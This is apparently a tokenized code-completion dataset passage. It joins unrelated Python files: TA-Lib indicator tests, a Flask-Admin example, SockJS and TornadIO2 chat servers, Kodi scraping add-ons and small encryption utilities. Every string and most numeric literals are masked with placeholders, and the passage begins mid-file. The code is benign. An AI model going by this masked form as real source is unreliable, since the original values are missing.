<NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( lower [ i + <NUM_LIT> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> def test_DEMA ( ) : <EOL> result = func . DEMA ( series ) <EOL> i = np . where ( ~ np . isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_true ( len ( series ) == len ( result ) ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:1> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:2> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:3> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:4> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> def test_EMAEMA ( ) : <EOL> result = func . EMA ( series , timeperiod = <NUM_LIT:2> ) <EOL> result = func . EMA ( result , timeperiod = <NUM_LIT:2> ) <EOL> i = np . where ( ~ np . isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_true ( len ( series ) == len ( result ) ) <EOL> assert_equals ( i , <NUM_LIT:2> ) <EOL> def test_CDL3BLACKCROWS ( ) : <EOL> o = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> h = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> l = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> c = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> result = func . CDL3BLACKCROWS ( o , h , l , c ) <EOL> assert_np_arrays_equal ( result , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:100> , <NUM_LIT:0> , <NUM_LIT:0> ] ) </s>
<s> from flask import Flask <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from wtforms import fields , widgets <EOL> from flask . ext import admin <EOL> from flask . ext . admin . contrib import sqla <EOL> app = Flask ( __name__ ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = True <EOL> db = SQLAlchemy ( app ) <EOL> class CKTextAreaWidget ( widgets . TextArea ) : <EOL> def __call__ ( self , field , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return super ( CKTextAreaWidget , self ) . __call__ ( field , ** kwargs ) <EOL> class CKTextAreaField ( fields . TextAreaField ) : <EOL> widget = CKTextAreaWidget ( ) <EOL> class Page ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . Unicode ( <NUM_LIT:64> ) ) <EOL> text = db . Column ( db . UnicodeText ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class PageAdmin ( sqla . ModelView ) : <EOL> form_overrides = dict ( text = CKTextAreaField ) <EOL> create_template = '<STR_LIT>' <EOL> edit_template = '<STR_LIT>' <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> admin = admin . Admin ( app , name = "<STR_LIT>" ) <EOL> admin . add_view ( PageAdmin ( Page , db . session ) ) <EOL> db . create_all ( ) <EOL> app . run ( debug = True ) </s>
<s> from peewee import PrimaryKeyField <EOL> def get_primary_key ( model ) : <EOL> for n , f in model . _meta . get_sorted_fields ( ) : <EOL> if type ( f ) == PrimaryKeyField or f . primary_key : <EOL> return n <EOL> def parse_like_term ( term ) : <EOL> if term . startswith ( '<STR_LIT>' ) : <EOL> stmt = '<STR_LIT>' % term [ <NUM_LIT:1> : ] <EOL> elif term . startswith ( '<STR_LIT:=>' ) : <EOL> stmt = term [ <NUM_LIT:1> : ] <EOL> else : <EOL> stmt = '<STR_LIT>' % term <EOL> return stmt </s>
<s> def macro ( name ) : <EOL> '''<STR_LIT>''' <EOL> def inner ( view , context , model , column ) : <EOL> m = context . resolve ( name ) <EOL> if not m : <EOL> return m <EOL> return m ( model = model , column = column ) <EOL> return inner </s>
<s> import tornado . ioloop <EOL> import tornado . web <EOL> from sockjs . tornado import SockJSConnection , SockJSRouter <EOL> from multiplex import MultiplexConnection <EOL> class IndexHandler ( tornado . web . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class MultiplexStaticHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class AnnConnection ( SockJSConnection ) : <EOL> def on_open ( self , info ) : <EOL> self . send ( '<STR_LIT>' ) <EOL> def on_message ( self , message ) : <EOL> self . send ( '<STR_LIT>' + message ) <EOL> class BobConnection ( SockJSConnection ) : <EOL> def on_open ( self , info ) : <EOL> self . send ( '<STR_LIT>' ) <EOL> def on_message ( self , message ) : <EOL> self . send ( '<STR_LIT>' + message ) <EOL> class CarlConnection ( SockJSConnection ) : <EOL> def on_open ( self , info ) : <EOL> self . send ( '<STR_LIT>' ) <EOL> self . close ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import logging <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> router = MultiplexConnection . get ( ann = AnnConnection , bob = BobConnection , carl = CarlConnection ) <EOL> EchoRouter = SockJSRouter ( router , '<STR_LIT>' ) <EOL> app = tornado . web . Application ( <EOL> [ ( r"<STR_LIT:/>" , IndexHandler ) , ( r"<STR_LIT>" , MultiplexStaticHandler ) ] + EchoRouter . urls <EOL> ) <EOL> app . listen ( <NUM_LIT> ) <EOL> tornado . ioloop . IOLoop . instance ( ) . start ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from tornado . web import asynchronous <EOL> from sockjs . tornado import proto <EOL> from sockjs . tornado . transports import pollingbase <EOL> from sockjs . tornado . util import bytes_to_str <EOL> LOG = logging . getLogger ( "<STR_LIT>" ) <EOL> class XhrPollingTransport ( pollingbase . PollingTransportBase ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> @ asynchronous <EOL> def post ( self , session_id ) : <EOL> self . preflight ( ) <EOL> self . handle_session_cookie ( ) <EOL> self . disable_cache ( ) <EOL> if not self . _attach_session ( session_id , False ) : <EOL> return <EOL> if not self . session : <EOL> return <EOL> if not self . session . send_queue : <EOL> self . session . start_heartbeat ( ) <EOL> else : <EOL> self . session . flush ( ) <EOL> def send_pack ( self , message , binary = False ) : <EOL> if binary : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . active = False <EOL> try : <EOL> self . set_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> self . set_header ( '<STR_LIT>' , len ( message ) + <NUM_LIT:1> ) <EOL> self . write ( message + '<STR_LIT:\n>' ) <EOL> self . flush ( callback = self . send_complete ) <EOL> except IOError : <EOL> self . session . delayed_close ( ) <EOL> class XhrSendHandler ( pollingbase . PollingTransportBase ) : <EOL> def post ( self , session_id ) : <EOL> self . preflight ( ) <EOL> self . handle_session_cookie ( ) <EOL> self . disable_cache ( ) <EOL> session = self . _get_session ( session_id ) <EOL> if session is None or session . is_closed : <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> data = self . request . body <EOL> if not data : <EOL> self . write ( "<STR_LIT>" ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> try : <EOL> messages = proto . json_decode ( bytes_to_str ( data ) ) <EOL> except : <EOL> self . write ( "<STR_LIT>" ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> try : <EOL> session . on_messages ( messages ) <EOL> except Exception : <EOL> LOG . exception ( '<STR_LIT>' ) <EOL> session . close ( ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . set_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) </s>
<s> from os import path as op <EOL> import tornado . web <EOL> import tornadio2 <EOL> import tornadio2 . router <EOL> import tornadio2 . server <EOL> import tornadio2 . conn <EOL> ROOT = op . normpath ( op . dirname ( __file__ ) ) <EOL> class IndexHandler ( tornado . web . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class SocketIOHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class WebSocketFileHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . set_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> with open ( op . join ( ROOT , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as f : <EOL> self . write ( f . read ( ) ) <EOL> self . finish ( ) <EOL> class ChatConnection ( tornadio2 . conn . SocketConnection ) : <EOL> participants = set ( ) <EOL> def on_open ( self , info ) : <EOL> self . send ( "<STR_LIT>" ) <EOL> self . participants . add ( self ) <EOL> def on_message ( self , message ) : <EOL> for p in self . participants : <EOL> p . send ( message ) <EOL> def on_close ( self ) : <EOL> self . participants . remove ( self ) <EOL> ChatRouter = tornadio2 . router . TornadioRouter ( ChatConnection , dict ( websocket_check = True ) ) <EOL> application = tornado . web . Application ( <EOL> ChatRouter . apply_routes ( [ ( r"<STR_LIT:/>" , IndexHandler ) , <EOL> ( r"<STR_LIT>" , SocketIOHandler ) , <EOL> ( r"<STR_LIT>" , WebSocketFileHandler ) <EOL> ] ) , <EOL> flash_policy_port = <NUM_LIT> , <EOL> flash_policy_file = op . join ( ROOT , '<STR_LIT>' ) , <EOL> socket_io_port = <NUM_LIT> <EOL> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import logging <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> tornadio2 . server . SocketServer ( application , ssl_options = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) </s>
<s> import urllib , urllib2 , re , os , sys , math <EOL> import xbmcgui , xbmc , xbmcaddon , xbmcplugin <EOL> from BeautifulSoup import BeautifulSoup <EOL> import urllib <EOL> import mrknow_pLog , mrknow_pCommon , mrknow_Parser , mrknow_Player , mrknow_Pageparser <EOL> scriptID = '<STR_LIT>' <EOL> scriptname = "<STR_LIT>" <EOL> ptv = xbmcaddon . Addon ( scriptID ) <EOL> BASE_RESOURCE_PATH = os . path . join ( ptv . getAddonInfo ( '<STR_LIT:path>' ) , "<STR_LIT>" ) <EOL> sys . path . append ( os . path . join ( BASE_RESOURCE_PATH , "<STR_LIT>" ) ) <EOL> mainUrl = '<STR_LIT>' <EOL> MENU_TAB = { <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> } <EOL> class bajkipopolsku : <EOL> def __init__ ( self ) : <EOL> self . cm = mrknow_pCommon . common ( ) <EOL> self . parser = mrknow_Parser . mrknow_Parser ( ) <EOL> self . pp1 = mrknow_Pageparser . mrknow_Pageparser ( ) <EOL> self . player = mrknow_Player . mrknow_Player ( ) <EOL> self . log = mrknow_pLog . pLog ( ) <EOL> self . log . info ( '<STR_LIT>' ) <EOL> def listsMainMenu ( self , table ) : <EOL> for num , val in table . items ( ) : <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , val , '<STR_LIT:None>' , '<STR_LIT:None>' , '<STR_LIT:None>' , '<STR_LIT:None>' , '<STR_LIT:None>' , True , False ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def getSearchURL ( self , key ) : <EOL> url = urllib . quote_plus ( key ) <EOL> return url <EOL> def listsCategoriesMenu ( self , url ) : <EOL> HEADER = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : self . cm . randomagent ( ) } <EOL> query_data = { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True , '<STR_LIT>' : HEADER , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True } <EOL> link = self . cm . getURLRequestData ( query_data ) <EOL> soup = BeautifulSoup ( link ) <EOL> linki_ost1 = soup . find ( '<STR_LIT>' , { "<STR_LIT:id>" : "<STR_LIT>" } ) <EOL> linki_all1 = linki_ost1 . findAll ( '<STR_LIT>' ) <EOL> for mylink in linki_all1 : <EOL> self . log ( "<STR_LIT>" % ( mylink . a . text , mylink . a [ '<STR_LIT>' ] ) ) <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , self . cm . html_special_chars ( mylink . a . text . encode ( '<STR_LIT:utf-8>' ) ) , '<STR_LIT:None>' , '<STR_LIT:None>' , mylink . a [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:None>' , True , False ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def listsItems ( self , url ) : <EOL> HEADER = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : self . cm . randomagent ( ) } <EOL> query_data = { '<STR_LIT:url>' : url , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True , '<STR_LIT>' : HEADER , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True } <EOL> link = self . cm . getURLRequestData ( query_data ) <EOL> soup = BeautifulSoup ( link ) <EOL> linki_ost = soup . find ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> if linki_ost : <EOL> linki_all = linki_ost . findAll ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> for mylink in linki_all : <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:None>' , self . cm . html_special_chars ( mylink . img [ '<STR_LIT>' ] . encode ( '<STR_LIT:utf-8>' ) ) , mylink . img [ '<STR_LIT:src>' ] , mylink . a [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:None>' , False , True ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def listsItems2 ( self , url ) : <EOL> HEADER = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : self . cm . randomagent ( ) } <EOL> query_data = { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True , '<STR_LIT>' : HEADER , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True } <EOL> link = self . cm . getURLRequestData ( query_data ) <EOL> soup = BeautifulSoup ( link ) <EOL> linki_ost = soup . find ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> if linki_ost : <EOL> linki_all = linki_ost . findAll ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> for mylink in linki_all : <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:None>' , self . cm . html_special_chars ( mylink . text . encode ( '<STR_LIT:utf-8>' ) ) , mylink . img [ '<STR_LIT:src>' ] , mylink . a [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:None>' , False , True ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def searchInputText ( self ) : <EOL> text = None <EOL> k = xbmc . Keyboard ( ) <EOL> k . doModal ( ) <EOL> if ( k . isConfirmed ( ) ) : <EOL> text = k . getText ( ) <EOL> return text <EOL> def add ( self , service , name , category , title , iconimage , url , desc , rating , folder = True , isPlayable = True , strona = '<STR_LIT>' ) : <EOL> u = sys . argv [ <NUM_LIT:0> ] + "<STR_LIT>" + service + "<STR_LIT>" + name + "<STR_LIT>" + category + "<STR_LIT>" + title + "<STR_LIT>" + urllib . quote_plus ( url ) + "<STR_LIT>" + urllib . quote_plus ( iconimage ) + "<STR_LIT>" + urllib . quote_plus ( strona ) <EOL> if name == '<STR_LIT>' or name == '<STR_LIT>' : <EOL> title = category <EOL> if iconimage == '<STR_LIT>' : <EOL> iconimage = "<STR_LIT>" <EOL> liz = xbmcgui . ListItem ( title , iconImage = "<STR_LIT>" , thumbnailImage = iconimage ) <EOL> if isPlayable : <EOL> liz . setProperty ( "<STR_LIT>" , "<STR_LIT:true>" ) <EOL> liz . setInfo ( type = "<STR_LIT>" , infoLabels = { "<STR_LIT>" : title } ) <EOL> xbmcplugin . addDirectoryItem ( handle = int ( sys . argv [ <NUM_LIT:1> ] ) , url = u , listitem = liz , isFolder = folder ) <EOL> def handleService ( self ) : <EOL> params = self . parser . getParams ( ) <EOL> name = self . parser . getParam ( params , "<STR_LIT:name>" ) <EOL> category = self . parser . getParam ( params , "<STR_LIT>" ) <EOL> url = self . parser . getParam ( params , "<STR_LIT:url>" ) <EOL> title = self . parser . getParam ( params , "<STR_LIT:title>" ) <EOL> icon = self . parser . getParam ( params , "<STR_LIT>" ) <EOL> strona = self . parser . getParam ( params , "<STR_LIT>" ) <EOL> if strona == None : <EOL> strona = '<STR_LIT:1>' <EOL> print ( "<STR_LIT>" , strona ) <EOL> print ( "<STR_LIT:name>" , name ) <EOL> print ( "<STR_LIT>" , category ) <EOL> if name == None : <EOL> self . listsMainMenu ( MENU_TAB ) <EOL> elif name == '<STR_LIT>' and category == '<STR_LIT>' : <EOL> self . listsItems2 ( mainUrl ) <EOL> elif name == '<STR_LIT>' and category == "<STR_LIT>" : <EOL> self . listsCategoriesMenu ( mainUrl ) <EOL> elif name == '<STR_LIT>' and category == "<STR_LIT>" : <EOL> key = self . searchInputText ( ) <EOL> self . listsItems2 ( '<STR_LIT>' , self . getSearchURL ( key ) ) <EOL> elif name == '<STR_LIT>' and category != '<STR_LIT:None>' : <EOL> self . listsItems ( url ) <EOL> if name == '<STR_LIT>' : <EOL> self . log . info ( '<STR_LIT>' + str ( url ) ) <EOL> mojeurl = self . pp1 . getVideoLink ( url ) <EOL> self . player . LOAD_AND_PLAY_VIDEO ( mojeurl , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> __version__ = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import sys , getpass , getopt , os <EOL> from crypto . cipher . trolldoll import Trolldoll <EOL> from crypto . errors import DecryptNotBlockAlignedError <EOL> from binascii_plus import * <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> path , progName = os . path . split ( sys . argv [ <NUM_LIT:0> ] ) <EOL> usage = """<STR_LIT>""" % progName <EOL> try : <EOL> optlist , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT>' ) <EOL> except getopt . GetoptError , err : <EOL> sys . exit ( "<STR_LIT>" % ( err , usage ) ) <EOL> print optlist , '<STR_LIT>' , args <EOL> optdict = { } <EOL> for option in optlist : <EOL> if not optdict . has_key ( option [ <NUM_LIT:0> ] ) : <EOL> optdict [ option [ <NUM_LIT:0> ] ] = option [ <NUM_LIT:1> ] <EOL> else : <EOL> sys . exit ( "<STR_LIT>" % ( option [ <NUM_LIT:0> ] , usage ) ) <EOL> if optdict . has_key ( '<STR_LIT>' ) and optdict . has_key ( '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" % usage ) <EOL> if not ( optdict . has_key ( '<STR_LIT>' ) or optdict . has_key ( '<STR_LIT>' ) ) : <EOL> sys . exit ( "<STR_LIT>" % usage ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> passPhrase = optdict [ '<STR_LIT>' ] <EOL> else : <EOL> passPhrase = getpass . getpass ( '<STR_LIT>' ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> infile = open ( optdict [ '<STR_LIT>' ] , '<STR_LIT:rb>' ) <EOL> input = infile . read ( ) <EOL> else : <EOL> input = sys . stdin . read ( ) <EOL> print "<STR_LIT>" % ( len ( input ) , b2a_pt ( input ) ) <EOL> alg = Trolldoll ( ivSize = <NUM_LIT> ) <EOL> alg . setPassphrase ( passPhrase ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> output = alg . encrypt ( input ) <EOL> elif optdict . has_key ( '<STR_LIT>' ) : <EOL> try : <EOL> output = alg . decrypt ( input ) <EOL> except DecryptNotBlockAlignedError , errMessage : <EOL> sys . exit ( """<STR_LIT>""" % errMessage ) <EOL> else : <EOL> sys . exit ( "<STR_LIT>" % usage ) <EOL> print "<STR_LIT>" % ( len ( output ) , b2a_pt ( output ) ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> outfile = open ( optdict [ '<STR_LIT>' ] , '<STR_LIT:wb>' ) <EOL> outfile . write ( output ) <EOL> else : <EOL> sys . stdout . write ( output ) <EOL> sys . exit ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> """<STR_LIT>""" <EOL> main ( ) </s>
<s> def EVP_BytesToKey ( md , data , salt , keyLength , ivLength , count ) : <EOL> assert ( data ) <EOL> assert ( keyLength > <NUM_LIT:0> ) <EOL> assert ( ivLength >= <NUM_LIT:0> ) <EOL> if salt : <EOL> assert ( len ( salt ) == <NUM_LIT:8> ) <EOL> assert ( count >= <NUM_LIT:1> ) <EOL> key = iv = hashed = '<STR_LIT>' <EOL> while <NUM_LIT:1> : <EOL> m = md ( ) <EOL> if hashed : <EOL> m . update ( hashed ) <EOL> m . update ( data ) <EOL> if salt : <EOL> m . update ( salt ) <EOL> hashed = m . digest ( ) <EOL> for i in xrange ( count - <NUM_LIT:1> ) : <EOL> m = md ( ) <EOL> m . update ( hashed ) <EOL> hashed = m . digest ( ) <EOL> keyNeeds = keyLength - len ( key ) <EOL> tmp = hashed <EOL> if keyNeeds > <NUM_LIT:0> : <EOL> key += tmp [ : keyNeeds ] <EOL> tmp = tmp [ keyNeeds : ] <EOL> ivNeeds = ivLength - len ( iv ) <EOL> if tmp and ( ivNeeds > <NUM_LIT:0> ) : <EOL> iv += tmp [ : ivNeeds ] <EOL> if keyNeeds == ivNeeds == <NUM_LIT:0> : <EOL> break <EOL> return key , iv </s>
<s> '''<STR_LIT>''' <EOL> import sys , re , json , urllib , urlparse , datetime <EOL> from resources . lib . libraries import control <EOL> from resources . lib . libraries import client <EOL> from resources . lib . libraries import workers <EOL> class channels : <EOL> def __init__ ( self ) : <EOL> self . list = [ ] ; self . items = [ ] <EOL> self . uk_datetime = self . uk_datetime ( ) <EOL> self . systime = ( self . uk_datetime ) . strftime ( '<STR_LIT>' ) <EOL> self . imdb_by_query = '<STR_LIT>' <EOL> self . sky_now_link = '<STR_LIT>' <EOL> self . sky_programme_link = '<STR_LIT>' <EOL> def get ( self ) : <EOL> channels = [ ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> threads = [ ] <EOL> for i in channels : threads . append ( workers . Thread ( self . sky_list , i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] , i [ <NUM_LIT:2> ] ) ) <EOL> [ i . start ( ) for i in threads ] <EOL> [ i . join ( ) for i in threads ] <EOL> threads = [ ] <EOL> for i in range ( <NUM_LIT:0> , len ( self . items ) ) : threads . append ( workers . Thread ( self . items_list , self . items [ i ] ) ) <EOL> [ i . start ( ) for i in threads ] <EOL> [ i . join ( ) for i in threads ] <EOL> try : self . list = sorted ( self . list , key = lambda k : k [ '<STR_LIT>' ] ) <EOL> except : pass <EOL> self . channelDirectory ( self . list ) <EOL> return self . list <EOL> def sky_list ( self , num , channel , id ) : <EOL> try : <EOL> url = self . sky_now_link % id <EOL> result = client . request ( url , timeout = '<STR_LIT>' ) <EOL> result = json . loads ( result ) <EOL> match = result [ '<STR_LIT>' ] [ id ] [ <NUM_LIT:0> ] [ '<STR_LIT:url>' ] <EOL> dt1 = ( self . uk_datetime ) . strftime ( '<STR_LIT>' ) <EOL> dt2 = int ( ( self . uk_datetime ) . strftime ( '<STR_LIT>' ) ) <EOL> if ( dt2 < <NUM_LIT:6> ) : dt2 = <NUM_LIT:0> <EOL> elif ( dt2 >= <NUM_LIT:6> and dt2 < <NUM_LIT:12> ) : dt2 = <NUM_LIT:1> <EOL> elif ( dt2 >= <NUM_LIT:12> and dt2 < <NUM_LIT> ) : dt2 = <NUM_LIT:2> <EOL> elif ( dt2 >= <NUM_LIT> ) : dt2 = <NUM_LIT:3> <EOL> url = self . sky_programme_link % ( id , str ( dt1 ) , str ( dt2 ) ) <EOL> result = client . request ( url , timeout = '<STR_LIT>' ) <EOL> result = json . loads ( result ) <EOL> result = result [ '<STR_LIT>' ] [ id ] <EOL> result = [ i for i in result if i [ '<STR_LIT:url>' ] == match ] [ <NUM_LIT:0> ] <EOL> year = result [ '<STR_LIT:d>' ] <EOL> year = re . findall ( '<STR_LIT>' , year ) [ <NUM_LIT:0> ] . strip ( ) <EOL> year = year . encode ( '<STR_LIT:utf-8>' ) <EOL> title = result [ '<STR_LIT:t>' ] <EOL> title = title . replace ( '<STR_LIT>' % year , '<STR_LIT>' ) . strip ( ) <EOL> title = client . replaceHTMLCodes ( title ) <EOL> title = title . encode ( '<STR_LIT:utf-8>' ) <EOL> self . items . append ( ( title , year , channel , num ) ) <EOL> except : <EOL> pass <EOL> def items_list ( self , i ) : <EOL> try : <EOL> url = self . imdb_by_query % ( urllib . quote_plus ( i [ <NUM_LIT:0> ] ) , i [ <NUM_LIT:1> ] ) <EOL> item = client . request ( url , timeout = '<STR_LIT>' ) <EOL> item = json . loads ( item ) <EOL> title = item [ '<STR_LIT>' ] <EOL> title = client . replaceHTMLCodes ( title ) <EOL> title = title . encode ( '<STR_LIT:utf-8>' ) <EOL> year = item [ '<STR_LIT>' ] <EOL> year = re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ( year ) ) <EOL> year = year . encode ( '<STR_LIT:utf-8>' ) <EOL> name = '<STR_LIT>' % ( title , year ) <EOL> try : name = name . encode ( '<STR_LIT:utf-8>' ) <EOL> except : pass <EOL> imdb = item [ '<STR_LIT>' ] <EOL> if imdb == None or imdb == '<STR_LIT>' or imdb == '<STR_LIT>' : raise Exception ( ) <EOL> imdb = '<STR_LIT>' + re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ( imdb ) ) <EOL> imdb = imdb . encode ( '<STR_LIT:utf-8>' ) <EOL> poster = item [ '<STR_LIT>' ] <EOL> if poster == None or poster == '<STR_LIT>' or poster == '<STR_LIT>' : poster = '<STR_LIT:0>' <EOL> if not ( '<STR_LIT>' in poster or '<STR_LIT>' in poster ) : poster = '<STR_LIT:0>' <EOL> poster = re . sub ( '<STR_LIT>' , '<STR_LIT>' , poster ) <EOL> poster = poster . encode ( '<STR_LIT:utf-8>' ) <EOL> genre = item [ '<STR_LIT>' ] <EOL> if genre == None or genre == '<STR_LIT>' or genre == '<STR_LIT>' : genre = '<STR_LIT:0>' <EOL> genre = genre . replace ( '<STR_LIT:U+002CU+0020>' , 